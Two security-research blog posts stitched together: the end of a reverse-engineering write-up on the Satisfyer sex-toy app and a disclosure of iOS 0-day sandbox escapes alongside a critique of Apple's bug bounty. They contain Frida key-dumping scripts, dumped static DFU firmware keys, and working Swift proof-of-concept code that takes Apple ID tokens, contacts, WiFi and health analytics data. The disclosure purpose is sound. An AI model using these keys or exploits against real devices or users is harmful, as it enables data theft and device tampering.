┌ 20: sym.Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey (int64_t arg1);
│           ; arg int64_t arg1 @ x0
│           0x00000b40      080040f9       ldr x8, [x0]                ; 0xc7 ; load from memory to register; arg1
│           0x00000b44      01000090       adrp x1, 0
│           0x00000b48      210c2191       add x1, x1, str.7fe6a81597158366[...] ; 0x843 ; "7fe6a81597158366[...]" ; add two values
│           0x00000b4c      029d42f9       ldr x2, [x8, 0x538]         ; 0xcf ; load from memory to register
└           0x00000b50      40001fd6       br x2
[0x00000b40]> pxq @ 0x843
0x00000843  0x3531386136656637  0x3636333835313739   7fe6a81597158366

As you can see, a static key is loaded from address 0x843.


That was too easy, let’s check other methods to dump the key.
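When the key sits in the binary as a plain ASCII string like this, it can even be recovered without a disassembler. Here is a rough Python equivalent of the `strings` utility (the minimum length is arbitrary and the file path is hypothetical):

```python
import re

def printable_strings(blob: bytes, min_len: int = 16):
    # same idea as the `strings` utility: runs of printable ASCII characters
    return [m.group().decode() for m in re.finditer(rb"[ -~]{%d,}" % min_len, blob)]

# usage sketch (the path is hypothetical):
# with open("libjwt.so", "rb") as f:
#     for s in printable_strings(f.read()):
#         print(s)
```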

The Dynamic Way with Frida

As can be seen in one of the listings above, the Java method getReleaseKey() is declared as native. This means that the implementation of this function is present in a shared library that contains native code.

Calling things from the Java world into the native layer happens via JNI. Instead of bothering with the actual native implementation, Frida can be used to just call the getReleaseKey() Java method and dump the returned value. This can be accomplished with the following script:

var JwtTokenBuilderClass = Java.use("com.coreteka.satisfyer.api.jwt.JwtTokenBuilder");
var jwtTokenBuilder = JwtTokenBuilderClass.$new();
console.log("Release Key: " + jwtTokenBuilder.getReleaseKey());

Another way is to use the Frida Interceptor API to print the value returned by the Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey export of the native library, outside of the Java layer:

Interceptor.attach(Module.findExportByName("", "Java_com_coreteka_satisfyer_api_jwt_JwtTokenBuilder_getReleaseKey"), {
    onEnter: hookEnter,
    onLeave: hookLeave
});

function hookEnter(args) {
    console.log("[*] Enter getReleaseKey()");
}

function hookLeave(ret) {
    console.log("[*] Leave getReleaseKey()");

    // if it would return a byte[] instead of a String, one could use:

    // cast ret as byte[]
    var buffer = Java.array('byte', ret);
    var result = "";
    for (var i = 0; i < buffer.length; ++i) {
        result += String.fromCharCode(buffer[i]);
    }
    console.log(result);
}

An Alternative Way using r2Frida

Let’s just assume that there are more complex things going on than simply returning a hardcoded string. A neat way to debug and trace the key generation would involve using r2Frida to dump memory and register contents when executing specific instructions. In this specific case, the contents of the x1 register right after the add instruction at offset 0xb48 are of interest.

The plan is as follows:

  • Attach to the running app with r2Frida
  • Get the base address of the shared library
  • Add the offset of that instruction to this address
  • Add a trace command for this address to dump the contents of the x1 register
  • Trigger the key generation

Let’s see how it works.

After triggering the generation of a JWT, tracing kicks in and dumps the value of x1, which is a pointer to the hardcoded string.

As you can see, there are many ways Frida and r2Frida can be utilized to accomplish the same task. Depending on the target and requirements, these methods all have different advantages and disadvantages.

WebRTC via coturn

An interesting feature of the Satisfyer ecosystem is that the app offers different ways to communicate with remote peers:

  • End-to-End encrypted chats that support file attachments.
  • Calls via WebRTC that support controlling other people’s Satisfyer devices.

The latter feature depends on an internet-facing TURN (Traversal Using Relays around NAT) server that acts as a relay. Checking out hardcoded constants in the app source code reveals the following connection information:

public static final String TURN_SERVER_LOGIN = "admin";
public static final String TURN_SERVER_PASSWORD = "[...]";
public static final String TURN_SERVER_URL = "turn:t1.[...].com:3478";

As mentioned in the coturn readme file, one should use temporary credentials generated by the coturn server to allow client connections:

In the TURN REST API, there is no persistent passwords for users. A user has just the username. The password is always temporary, and it is generated by the web server on-demand, when the user accesses the WebRTC page. And, actually, a temporary one-time session only, username is provided to the user, too.
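A sketch of that documented scheme (function and parameter names are mine): the username carries an expiry timestamp, and the password is derived from it with a shared secret known only to the web server and coturn, so leaked credentials expire on their own.

```python
import base64
import hashlib
import hmac
import time

def turn_rest_credentials(user: str, shared_secret: bytes, expiry: int):
    # coturn's TURN REST API scheme: the username is "<expiry-unix-timestamp>:<user-id>"
    # and the password is base64(HMAC-SHA1(shared-secret, username))
    username = f"{expiry}:{user}"
    digest = hmac.new(shared_secret, username.encode(), hashlib.sha1).digest()
    return username, base64.b64encode(digest).decode()

# credentials valid for one hour from now
username, password = turn_rest_credentials("alice", b"shared-secret", int(time.time()) + 3600)
```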

This sounds different than what the Satisfyer app is currently using, since it uses an admin account with a static password. In fact, coturn servers offer a web interface, only reachable via HTTPS, that allows admin users to log in. Among other things, this access could allow viewing connection details of peers connected to the TURN server. Let’s just hope this panel is not accessible, right? RIGHT?

I’ve reported this and the vendor replied that they might patch this in the near future.

Software Updates and DFU Mode

Satisfyer devices support OTA updates, which allow the Android app to flash a new firmware via the DFU (Device Firmware Update) mode. Activating the DFU mode requires two things:

  • Bluetooth pairing was completed successfully.
  • Using a special DFU key to make a Satisfyer switch into DFU mode.

Guess where the DFU key comes from. Right, the same shared library:

var DfuKeyClass = Java.use("com.coreteka.satisfyer.ble.firmware.SettingsHelper");
var dfuKey = DfuKeyClass.$new();
console.log("DFU Key Generation 0: " + dfuKey.getDfuKey(0));
console.log("DFU Key Generation 1: " + dfuKey.getDfuKey(1));

Here are the keys I’ve dumped:

DFU Key Generation 0: 4E46F8C5092B29E29A971A0CD1F610FB1F6763DF807A7E70960D4CD3118E601A
DFU Key Generation 1: 4DB296E44E3CD64B003F78E584760B28B5B68417E5FD29D2DB9992618FFB62D5

These keys are static and specific for device generations 0 and 1.

All that’s left to flash something into a test device is a firmware package of the vendor. Unfortunately, all of my Satisfyer devices were already shipped to me with up-to-date firmware. There’s an API endpoint that allows downloading firmware images but it requires brute forcing various parameter values and I don’t want to do that 😀

A quick idea was to order an old Satisfyer but then I’ve noticed that buying items like these in used condition is very weird :S.

Messing with OTA and DFU

I’ve found a way to trigger the update process, that is calling 

 of the class 
. A great way to see what’s actually going on is to place hooks in any classes used for logging purposes. In case of Satisfyer Connect, the ZLogger class is used in many places to produce debug messages. This is what triggering the update process with a test file looks like:

[ZLogger]: filePath=/data/local/tmp/123.bin, startAddr=56, icType=5
[ZLogger]: headBuf=050013370101C28E04400000
[ZLogger]: icType=0x05, secure_version=0x00, otaFlag=0x00, imageId=0x0101, imageVersion=0x00000000, crc16=0x8ec2, imageSize=0x00004004(16388)
[ZLogger]: image: 1/1   {imageId=0x0000, version=0x0000}        progress: 0%(0/0)
[ZLogger]: OTA
[ZLogger]: image: 1/1   {imageId=0x0101, version=0x0000}        progress: 0%(0/16388)
[ZLogger]: Ota Environment prepared.
[ZLogger]: DFU: 0x0205 >> 0x0206(PROGRESS_REMOTE_ENTER_OTA)
[ZLogger]: << OPCODE_ENTER_OTA_MODE(0x01), enable device to enter OTA mode
[ZLogger]: [TX]0000ffd1-0000-1000-8000-00805f9b34fb >> (1)01
[ZLogger]: 0x0000 - SUCCESS << 0000ffd1-0000-1000-8000-00805f9b34fb
[ZLogger]: 4C:XX:XX:XX:XX:XX, status: 0x13-GATT_CONN_TERMINATE_PEER_USER , newState: 0-BluetoothProfile.STATE_DISCONNECTED
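The 12-byte headBuf from the log can be unpacked to cross-check those values. The little-endian layout below is inferred from the ZLogger output, and the field names are partly guesses (the meaning of the 0x13 0x37 bytes is unknown):

```python
import struct

def parse_ota_header(head: bytes) -> dict:
    # inferred little-endian layout: icType, secureVersion, <unknown>, imageId, crc16, imageSize
    ic_type, secure_version, _unknown, image_id, crc16, image_size = struct.unpack("<BBHHHI", head)
    return {"icType": ic_type, "secureVersion": secure_version,
            "imageId": image_id, "crc16": crc16, "imageSize": image_size}

# headBuf as printed by ZLogger
hdr = parse_ota_header(bytes.fromhex("050013370101C28E04400000"))
print(hdr)
```

The crc16 (0x8ec2) and imageSize (16388) fields come out exactly as logged, which supports the guessed layout.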

Based on the debug messages, I started to build a file that can be flashed onto the device. I lost interest in that shortly after, but in case my results are helpful for anyone, you can check my Python script to generate such a file below:

#!/usr/bin/env python3

FILE = b""

# header
FILE += b"\x47\x4D"

# sizeOfMergedFile
FILE += b"\x3e\x00\x00\x00"


# extension
FILE += b"\x05\x05"

# subFileIndicator
# 42 = count
# startOffset 0 (count * 12 + 44)
FILE += b"\x01\x00\x00\x00"

# start addr
FILE += b"\x10\x00"

# download addr
FILE += b"\x10\x00"

FILE += b"\x05\x00\x00\x00"

FILE += b"ZZaa"

### image file 1

# ic version
FILE += b"\x05"

# secure version
FILE += b"\x00"

# no idea
FILE += b"\x13\x37"

# image id
FILE += b"\x01\x01"

# crc16
FILE += b"\x8e\x04"

# size
FILE += b"\x40\x00\x00\x00"

# payload
FILE += b"A" * 0x40

with open("./thefile.bin", "wb") as f:
    f.write(FILE)

If anybody happens to have a flashable Satisfyer 

 file lying around, I’ll offer $13.37 PayPal for it, I swear.


  • 06/11/2021: Sent report for insecure coturn setup with hardcoded admin password to
  • 06/18/2021: Received notification that this issue might be addressed in the future.
  • 06/19/2021: Sent report for authentication bypass vulnerability to
  • 06/25/2021: Added additional details to report and asked for acknowledgement (again).
  • 06/30/2021: Sent info that blog post may be released soon to
  • 06/30/2021: Received acknowledgement, agreed that blog post will be released in max. two weeks, or before in case the vulnerability was fixed earlier.
  • 07/14/2021: Publishing blog post.

Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program

Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program

Original text by Denis Tokarev @illusionofchaos

I want to share my frustrating experience participating in the Apple Security Bounty program. I’ve reported four 0-day vulnerabilities this year between March 10 and May 4; as of now, three of them are still present in the latest iOS version (15.0) and one was fixed in 14.7, but Apple decided to cover it up and not list it on the security content page. When I confronted them, they apologized, assured me it happened due to a processing issue and promised to list it on the security content page of the next update. There have been three releases since then, and they broke their promise each time.

Ten days ago I asked for an explanation and warned them that I would make my research public if I didn’t receive one. My request was ignored, so I’m doing what I said I would. My actions are in accordance with responsible disclosure guidelines (Google Project Zero discloses vulnerabilities 90 days after reporting them to the vendor, ZDI — after 120). I have waited much longer, up to half a year in one case.

I’m not the first person who is unhappy with the Apple Security Bounty program. Here are some other reports and opinions:

Here are links to GitHub repositories that contain PoC source code that I’ve sent to Apple. Each repository contains an app that gathers sensitive information and presents it in the UI.

Gamed 0-day

Any app installed from the App Store may access the following data without any prompt from the user:

  • Apple ID email and full name associated with it
  • Apple ID authentication token which allows access to at least one of the endpoints on * on behalf of the user
  • Complete file system read access to the Core Duet database (contains a list of contacts from Mail, SMS, iMessage and 3rd-party messaging apps, metadata about all of the user’s interactions with these contacts (including timestamps and statistics), and also some attachments (like URLs and texts))
  • Complete file system read access to the Speed Dial database and the Address Book database, including contact pictures and other metadata like creation and modification dates (I’ve just checked on iOS 15 and this one is inaccessible, so it must have been quietly fixed recently)

Here is a short proof of concept (this one won’t actually compile, see GitHub repo for a workaround).

let connection = NSXPCConnection(machServiceName: "", options: NSXPCConnection.Options.privileged)!
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
    accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
        let appleID = response.credential.accountName
        let token = response.credential.authenticationToken
    })

    utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
        let addressBookData = data
    })
})

How it happens:

  • XPC service
     doesn’t properly check for
  • Even if Game Center is disabled on the device, invoking 
     returns several XPC proxy objects (
    , etc.).
  • If Game Center is enabled on the device (even if it’s not enabled for the app in App Store Connect and the app doesn’t contain the
     entitlement), invoking 
     returns an object containing the Apple ID of the user, the DSID and a Game Center authentication token (which allows sending requests to
     on behalf of the user). Invoking 
     on GKProfileService returns an object containing the first and last name of the user’s Apple ID. Invoking 
     returns an object with information about the user’s friends in Game Center.
  • Even if Game Center is disabled, it’s not enabled for the app in App Store Connect, and the app doesn’t contain the
     entitlement, invoking 
     allows reading arbitrary files outside of the app sandbox by passing file URLs to that method. The files that can be accessed that way include (but are not limited to) the following: 
     — contains mobile gestalt cache 
     — contains a list of contacts from Mail, SMS, iMessage, 3rd-party messaging apps and metadata about user’s interaction with these contacts (including timestamps and statistics) 
     — contains favorite contacts and their phone numbers 
     — contains complete Address Book database 
     — contains photos of Address book contacts
  • Invoking 
     on GKUtilityService might allow writing arbitrary data to a location outside of the app sandbox.

On the Apple Security Bounty Program page this vulnerability is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. “Sensitive data” access includes gaining a broad access (i.e., the full database) from Contacts).

Nehelper Enumerate Installed Apps 0-day

The vulnerability allows any user-installed app to determine whether any app is installed on the device, given its bundle ID.

XPC endpoint
 has a method accessible to any app that accepts a bundle ID as a parameter and returns an array containing some cache UUIDs if an app with a matching bundle ID is installed on the device, or an empty array otherwise. This happens in 
-[NEHelperCacheManager onQueueHandleMessage:]

func isAppInstalled(bundleId: String) -> Bool {
    let connection = xpc_connection_create_mach_service("", nil, 2)!
    xpc_connection_set_event_handler(connection, { _ in })
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1)
    xpc_dictionary_set_uint64(xdict, "cache-command", 3)
    xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId)
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil {
        return true
    }
    return false
}

Nehelper Wifi Info 0-day

XPC endpoint
 accepts user-supplied parameter 
, and if its value is less than or equal to 524288, the
 entitlement check is skipped. This makes it possible for any qualifying app (e.g. possessing location access authorization) to gain access to WiFi information without the required entitlement. This happens in 
-[NEHelperWiFiInfoManager checkIfEntitled:]

func wifi_info() -> String? {
    let connection = xpc_connection_create_mach_service("", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10)
    xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely
    xpc_dictionary_set_string(xdict, "interface-name", "en0")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    if let result = xpc_dictionary_get_value(reply, "result-data") {
        let ssid = String(cString: xpc_dictionary_get_string(result, "SSID"))
        let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID"))
        return "SSID: \(ssid)\nBSSID: \(bssid)"
    } else {
        return nil
    }
}

Analyticsd (fixed in iOS 14.7)

This vulnerability allows any user-installed app to access analytics logs (such as the ones that you can see in Settings -> Privacy -> Analytics & Improvements -> Analytics Data -> Analytics-90Day… and Analytics-Daily…). These logs contain the following information (including, but not limited to):

  • medical information (heart rate, count of detected atrial fibrillation and irregular heart rhythm events)
  • menstrual cycle length, biological sex and age, whether the user is logging sexual activity, cervical mucus quality, etc.
  • device usage information (device pickups in different contexts, push notifications count and user’s action, etc.)
  • screen time information and session count for all applications with their respective bundle IDs
  • information about device accessories with their manufacturer, model, firmware version and user-assigned names
  • application crashes with bundle IDs and exception codes
  • languages of web pages that user viewed in Safari

All this information is being collected by Apple for unknown purposes, which is quite disturbing, especially the fact that medical information is being collected. That’s why it’s very hypocritical of Apple to claim that they deeply care about privacy. All this data was being collected and available to an attacker even if “Share Analytics” was turned off in settings.

func analytics_json() -> String? {
    let connection = xpc_connection_create_mach_service("", nil, 2)
    xpc_connection_set_event_handler(connection, { _ in })
    let xdict = xpc_dictionary_create(nil, nil, 0)
    xpc_dictionary_set_string(xdict, "command", "log-dump")
    let reply = xpc_connection_send_message_with_reply_sync(connection, xdict)
    return xpc_dictionary_get_string(reply, "log-dump")
}


April 29 2021 — I sent a detailed report to Apple

April 30 2021 — Apple replied that they had reviewed the report and were investigating

May 20 2021 — I’ve requested a status update from Apple (and received no reply)

May 30 2021 — I’ve requested a status update from Apple

June 3 2021 — Apple replied that they plan to address the issue in the upcoming update

July 19 2021 — iOS 14.7 is released with the fix

July 20 2021 — I’ve requested a status update from Apple

July 21 2021 — iOS 14.7 security contents list is published, this vulnerability is not mentioned

July 22 2021 — I’ve asked Apple a question why the vulnerability is not on the list Same day I receive the following reply: Due to a processing issue, your credit will be included on the security advisories in an upcoming update. We apologize for the inconvenience.

July 26 2021 — iOS 14.7.1 security contents list is published, still no mention of this vulnerability

September 13 2021 — iOS 14.8 security contents list is published, still no mention of this vulnerability. Same day I asked for an explanation and informed Apple that I would make all my research public unless I received a reply soon

September 20 2021 — iOS 15.0 security contents list is published, still no mention of this vulnerability

September 24 2021 — I still haven’t received any reply so I publish this article


September 25 2021 — exactly 24 hours after this publication I finally received a reply from Apple. Here is what it said:

We saw your blog post regarding this issue and your other reports. We apologize for the delay in responding to you.

We want to let you know that we are still investigating these issues and how we can address them to protect customers. Thank you again for taking the time to report these issues to us, we appreciate your assistance. 

Please let us know if you have any questions.